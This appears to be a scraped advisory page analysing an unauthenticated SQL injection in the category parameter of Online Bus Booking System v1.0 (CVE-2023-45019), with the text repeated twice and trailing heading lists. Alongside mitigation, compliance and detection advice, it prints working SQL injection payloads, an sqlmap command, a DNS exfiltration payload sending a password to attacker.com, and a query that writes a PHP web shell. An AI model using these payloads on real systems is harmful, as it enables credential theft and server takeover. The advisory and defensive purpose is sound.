Comprehensive Technical Analysis of EUVD-2023-49341 (CVE-2023-45019)

Unauthenticated SQL Injection in Online Bus Booking System v1.0

1. Vulnerability Assessment and Severity Evaluation

Vulnerability Classification

Type: Unauthenticated SQL Injection (SQLi)
CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
OWASP Top 10: A03:2021 – Injection

Severity Analysis (CVSS v3.1: 9.8 Critical)

Metric	Value	Explanation
Attack Vector (AV)	Network (N)	Exploitable remotely over the internet.
Attack Complexity (AC)	Low (L)	No specialized conditions required; trivial to exploit.
Privileges Required (PR)	None (N)	No authentication needed.
User Interaction (UI)	None (N)	No user interaction required.
Scope (S)	Unchanged (U)	Impact is confined to the vulnerable system.
Confidentiality (C)	High (H)	Full database access, including sensitive user data.
Integrity (I)	High (H)	Arbitrary data manipulation (insertion, deletion, modification).
Availability (A)	High (H)	Potential for database corruption or denial of service.

Justification for Critical Severity:

Unauthenticated access allows attackers to exploit the flaw without credentials.
High impact on confidentiality, integrity, and availability (CIA triad).
Low attack complexity makes it accessible to script kiddies and automated tools.
Widespread exposure if the system is internet-facing.

2. Potential Attack Vectors and Exploitation Methods

Exploitation Mechanism

The vulnerability resides in the category parameter of category.php, where user-supplied input is directly concatenated into an SQL query without proper sanitization or parameterized queries.

Example Attack Scenario:

Identify the Vulnerable Endpoint:
- A typical request to category.php might look like:
```
GET /category.php?category=1 HTTP/1.1
Host: vulnerable-bus-booking.example.com
```
Basic SQL Injection Proof-of-Concept (PoC):
- Boolean-based Blind SQLi:
```
GET /category.php?category=1' AND 1=1--+ HTTP/1.1
```
  - If the page loads normally, the query is vulnerable.
  - If an error occurs, the application may be filtering input (but still potentially exploitable).
- Union-based SQLi (Data Exfiltration):
```
GET /category.php?category=1' UNION SELECT 1,2,3,username,password,6 FROM users--+ HTTP/1.1
```
  - Extracts usernames and passwords from the users table.
- Time-based Blind SQLi (For Stealth):
```
GET /category.php?category=1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--+ HTTP/1.1
```
  - Delays response by 5 seconds if vulnerable.
Automated Exploitation Tools:
- SQLmap (Automated exploitation):
```
sqlmap -u "http://vulnerable-bus-booking.example.com/category.php?category=1" --batch --dbs
```
  - Enumerates databases, tables, and extracts data.
- Manual Exploitation via Burp Suite / OWASP ZAP:
  - Intercept the request and modify the category parameter to inject malicious SQL.

Post-Exploitation Impact

Data Theft: Extraction of PII (Personally Identifiable Information), payment details, user credentials.
Database Manipulation: Insertion of fake bookings, alteration of schedules, or deletion of records.
Privilege Escalation: If the database contains admin credentials, attackers may gain full system control.
Remote Code Execution (RCE): In some cases, SQLi can lead to RCE via:
- Out-of-band (OOB) data exfiltration (e.g., DNS exfiltration).
- File write operations (e.g., writing a web shell via INTO OUTFILE in MySQL).
- Command execution (e.g., via xp_cmdshell in MSSQL).

3. Affected Systems and Software Versions

Vulnerable Product:

Online Bus Booking System v1.0
- Vendor: Projectworlds Pvt. Limited
- Product ID (ENISA): b02207bd-ca1b-36d7-891d-e9748585d517
- Vendor ID (ENISA): 9b713c70-0a35-3812-b611-8ffa78916fd7

Scope of Impact:

Deployment Environments:
- Web servers running PHP + MySQL/MariaDB (common LAMP/LEMP stacks).
- Likely used by small to medium-sized bus operators, travel agencies, or municipal transport systems.
Geographical Exposure:
- Primarily affects European organizations using this software, but could extend globally.
- EU-specific risks: Non-compliance with GDPR if PII is exposed (fines up to 4% of global revenue).

4. Recommended Mitigation Strategies

Immediate Remediation (Short-Term)

Input Validation & Sanitization:

Whitelist allowed characters (e.g., only alphanumeric for category).

Use prepared statements (parameterized queries) to prevent SQL injection:

// Secure PHP Example (PDO)
$pdo = new PDO('mysql:host=localhost;dbname=bus_booking', 'user', 'pass');
$stmt = $pdo->prepare("SELECT * FROM categories WHERE category_id = :category");
$stmt->execute(['category' => $_GET['category']]);

Web Application Firewall (WAF) Rules:
- Deploy ModSecurity with OWASP Core Rule Set (CRS) to block SQLi attempts.
- Example rule:
```
SecRule ARGS "@detectSQLi" "id:1000,deny,status:403,msg:'SQL Injection Attempt'"
```
Disable Detailed Error Messages:
- Prevent database error leakage (e.g., MySQL errors revealing table structures).
Least Privilege Database Access:
- Restrict database user permissions (e.g., no FILE privilege, limited SELECT/INSERT).

Long-Term Security Hardening

Code Review & Secure Development:
- Conduct a full security audit of the application using static (SAST) and dynamic (DAST) analysis tools.
- Adopt OWASP Secure Coding Practices (e.g., OWASP Cheat Sheet Series).
Regular Vulnerability Scanning:
- Use Nessus, OpenVAS, or Burp Suite to scan for SQLi and other vulnerabilities.
Patch Management:
- Monitor for vendor updates (though no patch is currently listed for v1.0).
- Consider migrating to a maintained alternative if the vendor does not provide fixes.
Network-Level Protections:
- Segment the database server from public access.
- Rate limiting to prevent brute-force SQLi attacks.

Incident Response (If Exploited)

Isolate the Affected System:
- Take the application offline or restrict access to trusted IPs.
Forensic Analysis:
- Check web server logs for suspicious category.php requests (e.g., UNION SELECT, SLEEP, --).
- Review database logs for unauthorized queries.
Data Breach Notification (GDPR Compliance):
- If PII is exposed, notify affected users and relevant data protection authorities (e.g., CNIL, ICO, BfDI) within 72 hours.
Password Resets & Credential Rotation:
- Force password changes for all users if credentials were compromised.

5. Impact on the European Cybersecurity Landscape

Regulatory & Compliance Risks

GDPR Non-Compliance:
- If the system processes EU citizen data, a breach could result in heavy fines (up to €20 million or 4% of global turnover).
- Article 32 (Security of Processing) requires "appropriate technical measures" to prevent SQLi.
NIS2 Directive (Network and Information Security):
- If the bus booking system is part of critical infrastructure (e.g., public transport), operators must report incidents to CSIRTs (Computer Security Incident Response Teams).
eIDAS & PSD2 (Payment Services):
- If payment data is stored, PCI DSS compliance is required.

Broader Cybersecurity Implications

Supply Chain Risks:
- Third-party vendors (e.g., Projectworlds) may introduce vulnerabilities into larger transport ecosystems.
Automated Exploitation:
- Botnets (e.g., Mirai, Mozi) could target vulnerable instances for DDoS, ransomware, or data exfiltration.
Reputation Damage:
- Public disclosure of a breach could erode trust in digital transport services, leading to financial losses.

EU-Specific Recommendations

ENISA Guidelines:
- Follow ENISA’s SQL Injection Prevention Guide.
CERT-EU Coordination:
- Report incidents to CERT-EU for cross-border threat intelligence sharing.
National CSIRTs:
- Engage with national cybersecurity agencies (e.g., ANSSI (France), BSI (Germany), NCSC (UK)) for incident response support.

6. Technical Details for Security Professionals

Vulnerable Code Analysis (Hypothetical Example)

The flaw likely stems from direct SQL query concatenation in PHP:

// UNSAFE CODE (Vulnerable to SQLi)
$category = $_GET['category'];
$query = "SELECT * FROM bus_categories WHERE category_id = '$category'";
$result = mysqli_query($conn, $query);

Why This is Dangerous:

No input sanitization.
No parameterized queries.
Direct string interpolation allows arbitrary SQL execution.

Exploitation Techniques

Technique	Example Payload	Purpose
Error-based SQLi	`1' AND (SELECT 0 FROM (SELECT COUNT(), CONCAT((SELECT database()), FLOOR(RAND(0)2)) x FROM information_schema.tables GROUP BY x) y)--+`	Extract database name via error messages.
Union-based SQLi	`1' UNION SELECT 1,2,3,username,password,6 FROM users--+`	Dump user credentials.
Boolean-based Blind	`1' AND 1=IF(SUBSTRING(@@version,1,1)='5',1,0)--+`	Determine MySQL version.
Time-based Blind	`1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--+`	Confirm vulnerability via delay.
Out-of-Band (OOB)	`1' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\share\\')))--+`	Exfiltrate data via DNS.

Database Fingerprinting

MySQL/MariaDB:
- SELECT @@version → Database version.
- SELECT schema_name FROM information_schema.schemata → List databases.
- SELECT table_name FROM information_schema.tables WHERE table_schema='bus_booking' → List tables.
PostgreSQL:
- SELECT version() → Version info.
- SELECT table_name FROM information_schema.tables WHERE table_schema='public' → List tables.
MSSQL:
- SELECT @@version → Version.
- SELECT name FROM sys.databases → List databases.

Post-Exploitation Persistence

Web Shell Upload (MySQL):

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'

Privilege Escalation:
- If the database user has FILE privileges, attackers can read/write arbitrary files.
- If xp_cmdshell is enabled (MSSQL), remote command execution is possible.

Detection & Monitoring

Log Analysis:
- Look for SQL keywords (UNION, SELECT, SLEEP, EXEC, DECLARE) in HTTP logs.
- Monitor for unusual database queries (e.g., information_schema access).

SIEM Rules (e.g., Splunk, ELK):

index=web_logs sourcetype=access_combined
| search uri_path="/category.php" AND (category="*UNION*" OR category="*SELECT*" OR category="*--*")
| stats count by src_ip, category
| where count > 5

Network Traffic Analysis:
- Detect DNS exfiltration (e.g., dig TXT <exfiltrated-data>.attacker.com).

Conclusion & Recommendations

Key Takeaways

EUVD-2023-49341 (CVE-2023-45019) is a critical unauthenticated SQL injection vulnerability with high impact on confidentiality, integrity, and availability.
Exploitation is trivial and can lead to full database compromise, data theft, and potential RCE.
European organizations using this software must act immediately to mitigate risks, especially given GDPR and NIS2 compliance requirements.

Action Plan for Security Teams

Immediate:
- Patch or apply WAF rules to block SQLi attempts.
- Isolate the system if exploitation is suspected.
Short-Term:
- Conduct a full security audit of the application.
- Rotate all credentials and review database permissions.
Long-Term:
- Migrate to a maintained alternative if no vendor patch is available.
- Implement secure coding practices and regular penetration testing.

Final Warning

Given the critical severity and ease of exploitation, this vulnerability is highly likely to be targeted by threat actors. Organizations must treat this as a priority to prevent data breaches and regulatory penalties.

References:

Comprehensive Technical Analysis of EUVD-2023-49341 (CVE-2023-45019)

Unauthenticated SQL Injection in Online Bus Booking System v1.0

1. Vulnerability Assessment and Severity Evaluation

Vulnerability Classification

Type: Unauthenticated SQL Injection (SQLi)
CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
OWASP Top 10: A03:2021 – Injection

Severity Analysis (CVSS v3.1: 9.8 Critical)

Metric	Value	Explanation
Attack Vector (AV)	Network (N)	Exploitable remotely over the internet.
Attack Complexity (AC)	Low (L)	No specialized conditions required; trivial to exploit.
Privileges Required (PR)	None (N)	No authentication needed.
User Interaction (UI)	None (N)	No user interaction required.
Scope (S)	Unchanged (U)	Impact is confined to the vulnerable system.
Confidentiality (C)	High (H)	Full database access, including sensitive user data.
Integrity (I)	High (H)	Arbitrary data manipulation (insertion, deletion, modification).
Availability (A)	High (H)	Potential for database corruption or denial of service.

Justification for Critical Severity:

Unauthenticated access allows attackers to exploit the flaw without credentials.
High impact on confidentiality, integrity, and availability (CIA triad).
Low attack complexity makes it accessible to script kiddies and automated tools.
Widespread exposure if the system is internet-facing.

2. Potential Attack Vectors and Exploitation Methods

Exploitation Mechanism

Example Attack Scenario:

Identify the Vulnerable Endpoint:
- A typical request to category.php might look like:
```
GET /category.php?category=1 HTTP/1.1
Host: vulnerable-bus-booking.example.com
```
Basic SQL Injection Proof-of-Concept (PoC):
- Boolean-based Blind SQLi:
```
GET /category.php?category=1' AND 1=1--+ HTTP/1.1
```
  - If the page loads normally, the query is vulnerable.
  - If an error occurs, the application may be filtering input (but still potentially exploitable).
- Union-based SQLi (Data Exfiltration):
```
GET /category.php?category=1' UNION SELECT 1,2,3,username,password,6 FROM users--+ HTTP/1.1
```
  - Extracts usernames and passwords from the users table.
- Time-based Blind SQLi (For Stealth):
```
GET /category.php?category=1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--+ HTTP/1.1
```
  - Delays response by 5 seconds if vulnerable.
Automated Exploitation Tools:
- SQLmap (Automated exploitation):
```
sqlmap -u "http://vulnerable-bus-booking.example.com/category.php?category=1" --batch --dbs
```
  - Enumerates databases, tables, and extracts data.
- Manual Exploitation via Burp Suite / OWASP ZAP:
  - Intercept the request and modify the category parameter to inject malicious SQL.

Post-Exploitation Impact

Data Theft: Extraction of PII (Personally Identifiable Information), payment details, user credentials.
Database Manipulation: Insertion of fake bookings, alteration of schedules, or deletion of records.
Privilege Escalation: If the database contains admin credentials, attackers may gain full system control.
Remote Code Execution (RCE): In some cases, SQLi can lead to RCE via:
- Out-of-band (OOB) data exfiltration (e.g., DNS exfiltration).
- File write operations (e.g., writing a web shell via INTO OUTFILE in MySQL).
- Command execution (e.g., via xp_cmdshell in MSSQL).

3. Affected Systems and Software Versions

Vulnerable Product:

Online Bus Booking System v1.0
- Vendor: Projectworlds Pvt. Limited
- Product ID (ENISA): b02207bd-ca1b-36d7-891d-e9748585d517
- Vendor ID (ENISA): 9b713c70-0a35-3812-b611-8ffa78916fd7

Scope of Impact:

Deployment Environments:
- Web servers running PHP + MySQL/MariaDB (common LAMP/LEMP stacks).
- Likely used by small to medium-sized bus operators, travel agencies, or municipal transport systems.
Geographical Exposure:
- Primarily affects European organizations using this software, but could extend globally.
- EU-specific risks: Non-compliance with GDPR if PII is exposed (fines up to 4% of global revenue).

4. Recommended Mitigation Strategies

Immediate Remediation (Short-Term)

Input Validation & Sanitization:

Whitelist allowed characters (e.g., only alphanumeric for category).

Use prepared statements (parameterized queries) to prevent SQL injection:

// Secure PHP Example (PDO)
$pdo = new PDO('mysql:host=localhost;dbname=bus_booking', 'user', 'pass');
$stmt = $pdo->prepare("SELECT * FROM categories WHERE category_id = :category");
$stmt->execute(['category' => $_GET['category']]);

Web Application Firewall (WAF) Rules:
- Deploy ModSecurity with OWASP Core Rule Set (CRS) to block SQLi attempts.
- Example rule:
```
SecRule ARGS "@detectSQLi" "id:1000,deny,status:403,msg:'SQL Injection Attempt'"
```
Disable Detailed Error Messages:
- Prevent database error leakage (e.g., MySQL errors revealing table structures).
Least Privilege Database Access:
- Restrict database user permissions (e.g., no FILE privilege, limited SELECT/INSERT).

Long-Term Security Hardening

Code Review & Secure Development:
- Conduct a full security audit of the application using static (SAST) and dynamic (DAST) analysis tools.
- Adopt OWASP Secure Coding Practices (e.g., OWASP Cheat Sheet Series).
Regular Vulnerability Scanning:
- Use Nessus, OpenVAS, or Burp Suite to scan for SQLi and other vulnerabilities.
Patch Management:
- Monitor for vendor updates (though no patch is currently listed for v1.0).
- Consider migrating to a maintained alternative if the vendor does not provide fixes.
Network-Level Protections:
- Segment the database server from public access.
- Rate limiting to prevent brute-force SQLi attacks.

Incident Response (If Exploited)

Isolate the Affected System:
- Take the application offline or restrict access to trusted IPs.
Forensic Analysis:
- Check web server logs for suspicious category.php requests (e.g., UNION SELECT, SLEEP, --).
- Review database logs for unauthorized queries.
Data Breach Notification (GDPR Compliance):
- If PII is exposed, notify affected users and relevant data protection authorities (e.g., CNIL, ICO, BfDI) within 72 hours.
Password Resets & Credential Rotation:
- Force password changes for all users if credentials were compromised.

5. Impact on the European Cybersecurity Landscape

Regulatory & Compliance Risks

GDPR Non-Compliance:
- If the system processes EU citizen data, a breach could result in heavy fines (up to €20 million or 4% of global turnover).
- Article 32 (Security of Processing) requires "appropriate technical measures" to prevent SQLi.
NIS2 Directive (Network and Information Security):
- If the bus booking system is part of critical infrastructure (e.g., public transport), operators must report incidents to CSIRTs (Computer Security Incident Response Teams).
eIDAS & PSD2 (Payment Services):
- If payment data is stored, PCI DSS compliance is required.

Broader Cybersecurity Implications

Supply Chain Risks:
- Third-party vendors (e.g., Projectworlds) may introduce vulnerabilities into larger transport ecosystems.
Automated Exploitation:
- Botnets (e.g., Mirai, Mozi) could target vulnerable instances for DDoS, ransomware, or data exfiltration.
Reputation Damage:
- Public disclosure of a breach could erode trust in digital transport services, leading to financial losses.

EU-Specific Recommendations

ENISA Guidelines:
- Follow ENISA’s SQL Injection Prevention Guide.
CERT-EU Coordination:
- Report incidents to CERT-EU for cross-border threat intelligence sharing.
National CSIRTs:
- Engage with national cybersecurity agencies (e.g., ANSSI (France), BSI (Germany), NCSC (UK)) for incident response support.

6. Technical Details for Security Professionals

Vulnerable Code Analysis (Hypothetical Example)

The flaw likely stems from direct SQL query concatenation in PHP:

// UNSAFE CODE (Vulnerable to SQLi)
$category = $_GET['category'];
$query = "SELECT * FROM bus_categories WHERE category_id = '$category'";
$result = mysqli_query($conn, $query);

Why This is Dangerous:

No input sanitization.
No parameterized queries.
Direct string interpolation allows arbitrary SQL execution.

Exploitation Techniques

Technique	Example Payload	Purpose
Error-based SQLi	`1' AND (SELECT 0 FROM (SELECT COUNT(), CONCAT((SELECT database()), FLOOR(RAND(0)2)) x FROM information_schema.tables GROUP BY x) y)--+`	Extract database name via error messages.
Union-based SQLi	`1' UNION SELECT 1,2,3,username,password,6 FROM users--+`	Dump user credentials.
Boolean-based Blind	`1' AND 1=IF(SUBSTRING(@@version,1,1)='5',1,0)--+`	Determine MySQL version.
Time-based Blind	`1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--+`	Confirm vulnerability via delay.
Out-of-Band (OOB)	`1' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\share\\')))--+`	Exfiltrate data via DNS.

Database Fingerprinting

MySQL/MariaDB:
- SELECT @@version → Database version.
- SELECT schema_name FROM information_schema.schemata → List databases.
- SELECT table_name FROM information_schema.tables WHERE table_schema='bus_booking' → List tables.
PostgreSQL:
- SELECT version() → Version info.
- SELECT table_name FROM information_schema.tables WHERE table_schema='public' → List tables.
MSSQL:
- SELECT @@version → Version.
- SELECT name FROM sys.databases → List databases.

Post-Exploitation Persistence

Web Shell Upload (MySQL):

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'

Privilege Escalation:
- If the database user has FILE privileges, attackers can read/write arbitrary files.
- If xp_cmdshell is enabled (MSSQL), remote command execution is possible.

Detection & Monitoring

Log Analysis:
- Look for SQL keywords (UNION, SELECT, SLEEP, EXEC, DECLARE) in HTTP logs.
- Monitor for unusual database queries (e.g., information_schema access).

SIEM Rules (e.g., Splunk, ELK):

index=web_logs sourcetype=access_combined
| search uri_path="/category.php" AND (category="*UNION*" OR category="*SELECT*" OR category="*--*")
| stats count by src_ip, category
| where count > 5

Network Traffic Analysis:
- Detect DNS exfiltration (e.g., dig TXT <exfiltrated-data>.attacker.com).

Conclusion & Recommendations

Key Takeaways

EUVD-2023-49341 (CVE-2023-45019) is a critical unauthenticated SQL injection vulnerability with high impact on confidentiality, integrity, and availability.
Exploitation is trivial and can lead to full database compromise, data theft, and potential RCE.
European organizations using this software must act immediately to mitigate risks, especially given GDPR and NIS2 compliance requirements.

Action Plan for Security Teams

Immediate:
- Patch or apply WAF rules to block SQLi attempts.
- Isolate the system if exploitation is suspected.
Short-Term:
- Conduct a full security audit of the application.
- Rotate all credentials and review database permissions.
Long-Term:
- Migrate to a maintained alternative if no vendor patch is available.
- Implement secure coding practices and regular penetration testing.

Final Warning

References:

EUVD-2023-49341

Description

EPSS Score:

Comprehensive Technical Analysis of EUVD-2023-49341 (CVE-2023-45019)

1. Vulnerability Assessment and Severity Evaluation

Vulnerability Classification

Severity Analysis (CVSS v3.1: 9.8 Critical)

2. Potential Attack Vectors and Exploitation Methods

Exploitation Mechanism

Example Attack Scenario:

Post-Exploitation Impact

3. Affected Systems and Software Versions

Vulnerable Product:

Scope of Impact:

4. Recommended Mitigation Strategies

Immediate Remediation (Short-Term)

Long-Term Security Hardening

Incident Response (If Exploited)

5. Impact on the European Cybersecurity Landscape

Regulatory & Compliance Risks

Broader Cybersecurity Implications

EU-Specific Recommendations

6. Technical Details for Security Professionals

Vulnerable Code Analysis (Hypothetical Example)

Exploitation Techniques

Database Fingerprinting

Post-Exploitation Persistence

Detection & Monitoring

Conclusion & Recommendations

Key Takeaways

Action Plan for Security Teams

Final Warning

References

Affected Products

Vendors

EUVD-2023-49341

Description

EPSS Score:

Comprehensive Technical Analysis of EUVD-2023-49341 (CVE-2023-45019)

1. Vulnerability Assessment and Severity Evaluation

Vulnerability Classification

Severity Analysis (CVSS v3.1: 9.8 Critical)

2. Potential Attack Vectors and Exploitation Methods

Exploitation Mechanism

Example Attack Scenario:

Post-Exploitation Impact

3. Affected Systems and Software Versions

Vulnerable Product:

Scope of Impact:

4. Recommended Mitigation Strategies

Immediate Remediation (Short-Term)

Long-Term Security Hardening

Incident Response (If Exploited)

5. Impact on the European Cybersecurity Landscape

Regulatory & Compliance Risks

Broader Cybersecurity Implications

EU-Specific Recommendations

6. Technical Details for Security Professionals

Vulnerable Code Analysis (Hypothetical Example)

Exploitation Techniques

Database Fingerprinting

Post-Exploitation Persistence

Detection & Monitoring

Conclusion & Recommendations

Key Takeaways

Action Plan for Security Teams

Final Warning

References

Affected Products

Vendors